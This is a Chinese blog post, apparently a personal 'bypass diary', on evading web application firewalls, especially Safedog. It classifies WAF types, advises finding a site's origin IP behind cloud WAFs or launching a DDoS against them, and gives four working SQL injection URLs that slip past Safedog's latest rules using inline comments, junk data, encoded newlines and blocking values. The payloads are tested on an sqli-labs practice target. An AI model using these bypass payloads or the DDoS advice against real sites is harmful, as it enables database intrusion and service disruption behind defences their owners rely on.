介绍

WAF的类型:
软件型 :
安全狗 云锁 D盾 .... //本地fuzz

云waf(IDS) :
部署在云端的 玄武盾 腾讯云 华为云 亚马逊云 //找到服务器的真正的IP地址,然后绑定到电脑的hosts文件,这种waf就不攻自破了

硬件型waf(加强版的防火墙) :
检测流量的 //真实的网站fuzz

代码型waf :
网站的所有入栈流量先经过该waf过滤在传入到想要执行的参数处 //除非扫目录,爆代码,文件包含读取文件

怎么绕云waf:
1 . 非暴力型 微步在线 全球ping 历史解析记录
2 .暴力型 ddos一波

安全狗，软件型WAF，互联网安全品牌，云安全服务与解决方案提供商。企业用户遍布互联网金融、电商、游戏、移动互联网、政府单位等多个行业。

---

---

---

开启绕狗之路

最新版本安全狗，最新规则

2023-01-09T07:33:13.png

就拿阿三的靶场来试试吧:

(1)先看看有没有正常运行

2023-01-09T07:34:11.png
不错

1.内联注释:

2023-01-09T07:44:55.png

http://www.sqli.com/Less-2/?id=1 and /*!000001*/=/*!000001*/-- +

2023-01-09T07:41:22.png
还是经久不衰

2.垃圾数据:

2023-01-09T07:46:25.png
2023-01-09T07:51:52.png

http://www.sqli.com/Less-2/?id=0 union/*/!%!*/select 1,2,3-- +

2023-01-09T07:52:45.png
够用够用

3.换行+内联注释:

数据库里长这样

2023-01-09T08:06:03.png

http://www.sqli.com/Less-2/?id=0%20/*!union--+%20/*%0Aselect%201,2,3*/--%20+

2023-01-09T08:06:35.png
有点东西

4.阻断值:

2023-01-09T08:09:56.png

http://www.sqli.com/Less-3/?id=1%27)%20like%20%22[%23]%22%20union/*//--/*/select%201,2,3--%20+

2023-01-09T08:14:16.png
新的东西

后持续更新
绕狗日记
开锁日记
破盾日记
......